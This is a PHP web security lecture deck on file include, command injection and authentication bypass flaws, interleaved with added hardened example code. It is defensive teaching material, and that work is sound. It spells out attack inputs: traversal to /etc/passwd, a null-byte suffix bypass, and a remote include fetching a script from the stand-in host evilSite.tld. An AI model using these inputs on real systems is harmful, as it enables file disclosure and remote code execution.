7/29/2019 Code Inject File Vuln Auth Bypass
1/44
Copyright Justin C. Klein Keane
PHP Vulnerability Potpourri
File Include, Command Injection & Authentication Bypass Vulnerabilities
File Include Vulnerabilities
Arbitrary file includes (reading)
Local file includes
Remote file includes
Directory traversal
Writing arbitrary files
Basic PHP File Includes
Four common functions:
include()
include_once()
require()
require_once()
The difference is that require() will die (with a fatal E_ERROR) if the specified file is not found
include() will only produce an E_WARNING
The _once variants will not re-include a file that has already been included
How Includes Work
When PHP includes a file it will parse any PHP code within that file
Anything not delimited with the PHP delimiters (<?php ... ?>) will be treated as plain text
Plain text will simply be rendered inline
Typical Include
Problems with Includes
Arbitrary local file includes triggered via malicious user input:
If the user supplies ../../../../../../../etc/passwd as the 'action' URL variable, that file will be rendered during page display!
Incorrect Protection Schemes
Some programmers will append a file extension to attempt to limit includes of files like /etc/passwd
This fails for several reasons; one is because PHP is written in C
Caveats of C
C doesn't have a string type
Instead strings are null terminated character arrays:
char foo[4];   /* three characters plus the terminating null */
int main() {
    foo[0] = 'B';
    foo[1] = 'A';
    foo[2] = 'R';
    foo[3] = '\0';   /* the terminator needs its own slot in the array */
    return 0;
}
Without the null at the end the string would have no end
C reads from the start of the string until it reaches the null character when printing strings
Tricking PHP with C Conventions
Using a null character triggers C constructs and defeats the prior example
If the user passes in:
action=../../../../../../etc/passwd%00
then PHP executes:
include('inc/../.././../../etc/passwd');
Because PHP terminates the string at the null byte (and ignores the appended '.php')
Most PHP programmers are unaware of this!
Other Include Strategies
There are other ways around extension protections
Attacker can provide the GET var:
?action=/path/to/other/php_file.php?
This renders the final .php as a GET var to the included php_file.php
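The dispatcher pattern the slides have been discussing, include('inc/' . $_GET['action'] . '.php'), beside a hardened version, as an added example that is not the deck's own code. The inc/ directory, the page names and the $action variable are assumptions; the null byte caveat reflects that PHP 5.3.4 and later reject filesystem paths containing NUL.

```php
<?php
// Added example (not the slides' code): vulnerable include dispatcher vs. a
// hardened one. inc/, the page map and $action are assumptions.

// Vulnerable: the '.php' suffix is the only control. Traversal sequences,
// a null byte (PHP < 5.3.4; later versions reject paths containing NUL)
// or a trailing '?' can still redirect the include, as the slides show.
function vulnerable_include_path(string $action): string
{
    return 'inc/' . $action . '.php';       // this string would be passed to include()
}

// Hardened: user input selects an entry from a fixed map and never becomes part of a path.
const PAGES = [
    'home'    => 'inc/home.php',
    'about'   => 'inc/about.php',
    'contact' => 'inc/contact.php',
];

function safe_include_path(string $action): ?string
{
    if (preg_match('/^[a-z0-9_]{1,32}$/', $action) !== 1) {
        return null;                         // anything but a short token is rejected outright
    }
    return PAGES[$action] ?? null;           // unknown key: nothing is included
}

// Defence in depth when a path must be computed: resolve it and confirm it
// stays inside the include directory (realpath() also collapses '..').
function resolves_inside(string $baseDir, string $candidate): bool
{
    $base = realpath($baseDir);
    $real = realpath($candidate);
    return $base !== false && $real !== false
        && strncmp($real, $base . DIRECTORY_SEPARATOR, strlen($base) + 1) === 0;
}

// Front controller
$action = $_GET['action'] ?? 'home';
$path   = safe_include_path($action);
if ($path === null || !resolves_inside(__DIR__ . '/inc', __DIR__ . '/' . $path)) {
    http_response_code(404);
    exit('Unknown page');
}
include __DIR__ . '/' . $path;
```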
Other Dangers of Includes
Often times include files are meant to be included, not directly referenced
Include files live on the filesystem
May contain vulnerabilities when called directly, as variables could be redefined or arbitrarily defined
Especially dangerous when register_globals is on!
Example
Main file:
Remote File Include
Rather than specifying a local resource, an attacker could specify a remote file for inclusion
Remote files must be served as plain text, rather than compiled PHP
Remote text is pulled for inclusion, then the local PHP compiler interprets the text, rendering the PHP locally
Remote File Include Requirements
/etc/php.ini has parameters that define the ability of PHP to include files:
;;;;;;;;;;;;;;;;;;; Fopen wrappers ;;;;;;;;;;;;;;;;;;;
; Whether to allow the treatment of URLs (like http:// or ftp://) as files.
allow_url_fopen = On
If allow_url_fopen is On
Attackers can include remote files:
Attacker can call
?action=http://evilSite.tld/evil_script.txt?
Other Include Strategies
Attackers can use includes to bypass direct access restrictions such as .htaccess
This could be used to expose files like config.ini files
Attackers can include Apache files like .htpasswd or .htaccess files, which are included as plain text, exposing their contents
Attackers can subvert program flow by calling files that are normally not included
Attackers can call files readable by Apache, such as files in /tmp which may contain sensitive data (like session cookies or malicious uploads)
Writing Files
PHP functionality used to write files includes:
File upload functions built into an application (such as image uploads)
Utilizing PHP filesystem commands such as fwrite()
Typical Image Upload Handler
$upload_dir = "files/";
// Only the directory part is stripped; the name, extension and type still come from the client
$filename = basename($_FILES['form_filename']['name']);
$target = $upload_dir . $filename;
if (move_uploaded_file($_FILES['form_filename']['tmp_name'], $target)) {
    echo $filename . " has been uploaded";
} else {
    echo "Error uploading file!";
}
Common Upload Errors
Collisions cause overwrites
File type is not checked
Programmer may assume only image files are being uploaded, but this isn't enforced
File type is checked inappropriately
Simply checking $_FILES['upload_file']['type'] is insufficient since this is a browser provided parameter
Double extensions (and the programmer only checks the first one)
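An upload handler that addresses each of the errors listed above, as an added example rather than code from the slides. The 'form_filename' field and files/ directory follow the deck's earlier snippet; the size limit, the allowed type list and the location of the upload directory are assumptions.

```php
<?php
// Added example (not the slides' code): hardened image upload handler.
// UPLOAD_DIR, MAX_BYTES and ALLOWED are assumptions for illustration.
const UPLOAD_DIR = __DIR__ . '/files/';   // ideally outside the web root, or served with PHP disabled
const MAX_BYTES  = 2 * 1024 * 1024;
const ALLOWED    = ['image/png' => 'png', 'image/jpeg' => 'jpg', 'image/gif' => 'gif'];

// Returns [true, extension] or [false, reason].
function validate_upload(array $file): array
{
    if (($file['error'] ?? UPLOAD_ERR_NO_FILE) !== UPLOAD_ERR_OK) { return [false, 'upload failed']; }
    if ($file['size'] > MAX_BYTES)                                 { return [false, 'too large']; }
    if (!is_uploaded_file($file['tmp_name']))                      { return [false, 'not an upload']; }

    // Never trust $_FILES[...]['type'] or the client-supplied name: sniff the bytes instead.
    $mime = (new finfo(FILEINFO_MIME_TYPE))->file($file['tmp_name']);
    if (!isset(ALLOWED[$mime]))                                    { return [false, 'type not allowed']; }
    if (@getimagesize($file['tmp_name']) === false)                { return [false, 'not an image']; }

    // The extension is chosen by the server from the sniffed type, so a
    // double extension such as "x.php.png" cannot keep its ".php".
    return [true, ALLOWED[$mime]];
}

function store_upload(array $file): string
{
    [$ok, $info] = validate_upload($file);
    if (!$ok) { throw new RuntimeException($info); }

    // Random server-generated name: no collisions, no overwrites, and no
    // attacker-chosen names such as ".htaccess".
    $target = UPLOAD_DIR . bin2hex(random_bytes(16)) . '.' . $info;
    if (!move_uploaded_file($file['tmp_name'], $target)) { throw new RuntimeException('move failed'); }
    chmod($target, 0644);                 // never executable
    return basename($target);
}

try {
    echo htmlspecialchars(store_upload($_FILES['form_filename'] ?? [])) . " has been uploaded";
} catch (RuntimeException $e) {
    http_response_code(400);
    error_log('upload rejected: ' . $e->getMessage());   // detail goes to the log, not the client
    echo "Error uploading file!";
}
```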
Exploits for File Uploads
Attacker uploads a PHP file which contains a backdoor or exposes other system files
Attacker uploads a .htaccess file overwriting Apache rules
Attacker overwrites existing files to insert a backdoor
fwrite()
The fwrite() function is a built in function that allows PHP (running under Apache) to write to file handles
Often used in installers to write config files
Also commonly used for logging
For more information see:
http://us3.php.net/manual/en/function.fwrite.php
What is Command Injection
Also known as arbitrary code execution
Attacker injects malicious input that is then passed to functions that execute shell commands based on the input
Typical Example
Injection Strategies
Shell commands are delimited by a semi-colon, so multiple commands can be chained together
The pound or hash (#) symbol denotes the beginning of a comment on the shell; any text following it will be ignored
Strategies similar to SQL injection can be utilized
Functions to Watch
Luckily, the list of commands which execute via a shell is somewhat limited:
system()
Executes the command and returns output
exec()
Executes command, can populate PHP variables with output and return values
passthru()
Executes command but only returns return status
Other Dangerous Functions
There are other, less common functions to watch out for
Backtick operators
$retval = `ls -lh *.php`;
shell_exec()
Same as backtick
Pipe Operations
PHP has commands that can open a pipe to a process, so input and output can be directed to the process
popen() and pclose()
$proc = popen('/bin/ls', 'r');
proc_open()
Offers more command control
Command Sanitization
PHP has two commands that can be used to scrub input before passing it to a command
escapeshellarg()
Adds quotes around the string and escapes any internal quotes
escapeshellcmd()
Escapes all special characters that could be used to interrupt or override execution flow
Note that you should still strive to sanitize to known good commands
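A command that shells out to ping, first in the injectable form the preceding slides describe and then restricted to known-good input and passed through escapeshellarg(), as an added example that is not from the deck. The 'host' parameter and the ping flags are assumptions.

```php
<?php
// Added example (not the slides' code): injectable shell command vs. one that
// sanitizes to known good input and quotes the argument. 'host' is an assumption.

// Vulnerable: whatever is in $_GET['host'], including the shell metacharacters
// the deck lists, becomes part of the command line handed to system()/exec().
function vulnerable_ping_command(string $host): string
{
    return 'ping -c 1 ' . $host;
}

// Step 1: sanitize to known good. Accept only an IPv4 address or a hostname
// made of labels of letters, digits and hyphens.
function is_valid_host(string $host): bool
{
    if (filter_var($host, FILTER_VALIDATE_IP, FILTER_FLAG_IPV4) !== false) {
        return true;
    }
    return strlen($host) <= 253
        && preg_match('/^(?!-)[a-z0-9-]{1,63}(?<!-)(\.(?!-)[a-z0-9-]{1,63}(?<!-))*$/i', $host) === 1;
}

// Step 2: quote the argument anyway, so the shell receives exactly one word.
function safe_ping_command(string $host): ?string
{
    if (!is_valid_host($host)) {
        return null;
    }
    return 'ping -c 1 ' . escapeshellarg($host);
}

$cmd = safe_ping_command($_GET['host'] ?? '');
if ($cmd === null) {
    http_response_code(400);
    exit('invalid host');
}
exec($cmd, $output, $status);         // $output: lines printed by ping, $status: exit code
echo '<pre>' . htmlspecialchars(implode("\n", $output)) . '</pre>';
```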
Other Nefarious Outliers
preg_replace() with the /e flag allows for command execution
This is certainly not the first place you would look to find command execution!
Executing PHP Commands
Using the eval() command
Because of PHP's dynamic nature, variables can actually be interpreted as commands:
Mitigation
PHP's php.ini contains a rarely used directive:
; This directive allows you to disable certain functions for security reasons.
; It receives a comma-delimited list of function names. This directive is
; *NOT* affected by whether Safe Mode is turned On or Off.
disable_functions = exec, system, passthru, eval
Won't completely cut off avenues of attack but can limit the programmer's power to introduce vulnerabilities
No way to limit backticks via php.ini
Auth Bypass
Authentication bypass is a vulnerability that allows an attacker to gain access to functionality without providing valid credentials
Attackers may seek to steal an authenticated user's session
May also be possible to initiate a privileged session without credentials
Some functionality may not need a session
Session Handling
PHP controls session data via a PHPSESSID cookie by default (defined in php.ini)
Session Cookies
Difficult to predict/guess
However, stored on the filesystem
Location determined by settings in /etc/php.ini:
session.save_path = "/var/lib/php/session"
; Whether to use cookies.
session.use_cookies = 1
; This option enables administrators to make their users invulnerable to
; attacks which involve passing session ids in URLs; defaults to 0.
; session.use_only_cookies = 1
; Name of the session (used as cookie name).
session.name = PHPSESSID
; Initialize session on request startup.
session.auto_start = 0
; Lifetime in seconds of cookie or, if 0, until browser is restarted.
session.cookie_lifetime = 0
; The path for which the cookie is valid.
session.cookie_path = /
; The domain for which the cookie is valid.
session.cookie_domain =
Permissions on Session Dir
# ls -lah /var/lib/php
total 156K
drwxr-xr-x  3 root root   4.0K Jun  2 12:13 .
drwxr-xr-x 21 root root   4.0K Jun  2 12:42 ..
drwxrwx---  2 root apache 132K Jun 22 14:37 session
Note that apache can read and write in this directory
phpinfo() Disclosure
Data Can be Leaked
If an attacker can leverage the webapp to list the cookie directory they can modify their own cookies
Cookie isn't tied to an IP, so the cookie holder automatically gains session access
Cookie can also be stolen from the end user
JavaScript can access cookies, with domain restrictions
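The session settings from the php.ini excerpt above, enforced from the application itself so that a permissive server default does not decide them, together with the id regeneration and idle timeout that limit what a leaked or stolen cookie is worth. This is an added example, not code from the slides; it needs PHP 7.3 or later for the array form of session_set_cookie_params(), and the custom save path and the 'user' session key are assumptions.

```php
<?php
// Added example (not the slides' code): application-enforced session hardening.
// The save path and the 'user'/'last_seen' session keys are assumptions.

// Session id only ever travels in the cookie, never in a URL (commented out in the deck's php.ini).
ini_set('session.use_only_cookies', '1');
// Reject ids the server never issued, so an attacker cannot pre-choose an id for a victim.
ini_set('session.use_strict_mode', '1');
// Keep this app's session files out of the shared, apache-writable default directory.
if (is_dir('/var/lib/php/myapp_sessions')) {            // assumed path
    ini_set('session.save_path', '/var/lib/php/myapp_sessions');
}

session_set_cookie_params([
    'lifetime' => 0,        // session cookie, discarded when the browser closes
    'path'     => '/',
    'domain'   => '',       // current host only
    'secure'   => true,     // never sent over plain HTTP, so it cannot be sniffed in transit
    'httponly' => true,     // not readable from JavaScript, so script injection cannot simply read it
    'samesite' => 'Lax',
]);
session_start();

// On login (privilege change) issue a fresh id, so an id known before
// authentication never becomes an authenticated one.
function promote_session(array $user): void
{
    session_regenerate_id(true);    // true: remove the old session file as well
    $_SESSION['user']      = $user;
    $_SESSION['last_seen'] = time();
}

// The deck notes the cookie is not tied to an IP; an idle timeout at least
// bounds how long a stolen cookie stays usable.
function session_expired(int $maxIdle = 1800): bool
{
    $last = $_SESSION['last_seen'] ?? time();
    $_SESSION['last_seen'] = time();
    return (time() - $last) > $maxIdle;
}

if (session_expired()) {
    session_unset();
    session_destroy();
}
```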
Logical Flaws
Application fails to check credentials properly
Name collisions, for instance
These will not be programming errors, so are much more difficult to detect
Limited Authentication
Application may only check for authentication in one place
Some files may assume that authentication has taken place but may be accessible outside of that flow
Brute Force
Steps should be taken to limit authentication attempts
At the very least log auth attempts and alert someone on multiple failures
Be sure to limit login failure feedback (don't alert an attacker to whether or not a username or password exists)
Be wary of password recovery functionality and information it might disclose to an attacker
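The throttling, logging and uniform failure message the slide asks for, as an added example that is not from the deck. The failure store is an array passed by reference so the policy stays self-contained; in a real application it would be a database or cache row, and the thresholds are assumptions.

```php
<?php
// Added example (not the slides' code): login attempt limiting. The array
// store, the thresholds and the $users map (username => password hash) are assumptions.
const MAX_FAILURES = 5;      // failures before the account is locked
const LOCKOUT_SECS = 900;    // lockout window: 15 minutes
const ALERT_AT     = 10;     // failure count at which an operator is alerted

function is_locked(array $store, string $key, int $now): bool
{
    $e = $store[$key] ?? null;
    return $e !== null && $e['count'] >= MAX_FAILURES && ($now - $e['last']) < LOCKOUT_SECS;
}

function record_failure(array &$store, string $key, int $now, string $ip): int
{
    $e = $store[$key] ?? ['count' => 0, 'last' => 0];
    if ($now - $e['last'] >= LOCKOUT_SECS) {
        $e['count'] = 0;                         // window expired: start counting again
    }
    $e['count']++;
    $e['last'] = $now;
    $store[$key] = $e;
    // Log every failure; escalate once the count looks like guessing rather than a typo.
    error_log(sprintf('auth failure user=%s ip=%s count=%d', $key, $ip, $e['count']));
    if ($e['count'] === ALERT_AT) {
        error_log(sprintf('ALERT: %d consecutive auth failures for user=%s from ip=%s', ALERT_AT, $key, $ip));
    }
    return $e['count'];
}

function record_success(array &$store, string $key): void
{
    unset($store[$key]);
}

// "No such user", "wrong password" and "locked out" all produce the same
// message, so the response does not reveal which usernames exist.
function login(array &$store, array $users, string $user, string $pass, string $ip, int $now): string
{
    $ok = !is_locked($store, $user, $now)
        && isset($users[$user])
        && password_verify($pass, $users[$user]);
    if (!$ok) {
        record_failure($store, $user, $now, $ip);
        return 'Invalid username or password';
    }
    record_success($store, $user);
    if (session_status() === PHP_SESSION_ACTIVE) {
        session_regenerate_id(true);            // fresh id for the authenticated session
    }
    return 'ok';
}
```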
Logout Failure
Applications that don't properly end sessions could leave them open for exploitation
Kiosks or other public terminals are prime offenders in these circumstances
Unencrypted Authentication
Cookies and/or post data may be stolen
Forms themselves should be encrypted, not just their post targets
MITM plain text keystroke loggers could be utilized on unencrypted login forms
Information Disclosure
There are many seemingly innocuous ways that information valuable to an attacker can be disclosed
Debugging messages
phpinfo() output can reveal configuration information
Plain text files such as .ini or .htaccess or .htpasswd files could be exposed
Directory listing could show files that would otherwise be difficult to find
HTML comments
Exposed Information
Assume any web accessible file can be read by an attacker
Tools for brute force guessing filenames and directories exist
Look at include files to make sure they can't be abused by being called directly
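One way to make an include file refuse direct requests, which the "Other Dangers of Includes" and "Limited Authentication" slides both warn about, shown as an added example rather than the deck's own "Main file" code. Two files appear in one listing; the file names, the IN_APP constant and the $currentUser shape are assumptions.

```php
<?php
// Added example (not the slides' code). Two files in one listing: the entry
// point index.php and the guarded include inc/user_panel.php. File names,
// IN_APP and the $currentUser array are assumptions.

// ---- index.php (main file) -----------------------------------------------
define('IN_APP', true);                  // proves the request came through the entry point
session_start();
$currentUser = $_SESSION['user'] ?? ['authenticated' => false, 'name' => ''];
require __DIR__ . '/inc/user_panel.php';

// ---- inc/user_panel.php ---------------------------------------------------
// This file assumes $currentUser was set by the caller. Requested directly,
// that assumption is false, and with register_globals on $currentUser could
// even be supplied from the query string, so refuse before using any of it.
if (!defined('IN_APP')) {
    http_response_code(403);
    exit('Direct access not permitted');
}
// Re-check authentication here too; do not rely on a single check elsewhere.
if (empty($currentUser['authenticated'])) {
    http_response_code(401);
    exit('Login required');
}
echo 'Welcome, ' . htmlspecialchars($currentUser['name']);
```

Serving the inc/ directory with an Apache deny rule or placing it outside the web root gives a second, independent layer; the in-code guard still matters because, as the slides note, an include can bypass .htaccess restrictions.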